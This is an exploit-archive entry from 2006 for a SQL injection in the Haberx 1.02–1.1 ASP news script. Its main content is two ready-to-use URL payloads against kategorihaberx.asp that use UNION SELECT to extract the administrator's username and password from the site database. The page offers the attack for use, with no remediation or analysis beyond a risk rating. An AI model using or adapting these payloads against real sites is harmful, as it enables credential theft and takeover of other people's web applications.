Haberx 1.02 <= 1.1 (tr) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Haberx 1.02 <= 1.1 (tr) Remote SQL Injection Vulnerability
# Published : 2006-09-15
# Author : Fix TR
# Previous Title : PhotoPost <= 4.6 (PP_PATH) Remote File Include Vulnerability
# Next Title : BolinOS <= 4.5.5 (gBRootPath) Remote File Include Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability    +
+ Author  : Fix TR                                +
+ Site    : www.hack.gen.tr                       +
+ Contact : fixtr[at]bsdmail.com                  +
+++++++++++++++++++++++++++++++++++++++++++++++++++

+ Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1
+ Bug In  : kategorix.asp
+ Risk    : High


+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1

+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1

# www.Syue.com [2006-09-15]